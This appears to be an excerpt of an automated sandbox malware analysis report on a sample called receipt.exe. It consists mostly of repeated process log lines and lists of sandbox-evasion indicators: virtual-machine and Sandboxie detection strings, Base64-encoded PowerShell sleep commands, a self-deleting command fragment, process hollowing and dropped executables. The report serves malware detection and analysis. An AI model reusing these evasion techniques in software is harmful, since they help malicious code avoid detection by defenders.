            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL&START-SLEEP -S 10; REMOVE-ITEM -PATH "
            Source: receipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.526287923.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\receipt.exe TID: 1076Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Users\user\Desktop\receipt.exe TID: 5832Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe TID: 5904Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe TID: 6008Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 812Thread sleep time: -11068046444225724s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5656Thread sleep count: 8862 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exeJump to dropped file
            Source: C:\Users\user\Desktop\receipt.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\receipt.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9354
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9136
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9170
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8862
            Source: C:\Users\user\Desktop\receipt.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\receipt.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\receipt.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen'
            Source: Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
            Source: Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
            Source: receipt.exe, 0000000C.00000002.529983371.00000000011F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: receipt.exe, 00000000.00000002.344350141.00000000013B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: receipt.exe, 0000001A.00000002.590003783.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\receipt.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\receipt.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\receipt.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\receipt.exeProcess created: Base64 decoded Start-Sleep -Seconds 20
            Source: C:\Users\user\Desktop\receipt.exeProcess created: Base64 decoded Start-Sleep -Seconds 50
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: Base64 decoded Start-Sleep -Seconds 20
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: Base64 decoded Start-Sleep -Seconds 20
            Source: C:\Users\user\Desktop\receipt.exeProcess created: Base64 decoded Start-Sleep -Seconds 20
            Source: C:\Users\user\Desktop\receipt.exeProcess created: Base64 decoded Start-Sleep -Seconds 50
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: Base64 decoded Start-Sleep -Seconds 20
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: Base64 decoded Start-Sleep -Seconds 20
            Source: C:\Users\user\Desktop\receipt.exeMemory written: C:\Users\user\Desktop\receipt.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\receipt.exeMemory written: C:\Users\user\Desktop\receipt.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeMemory written: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeMemory written: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe"
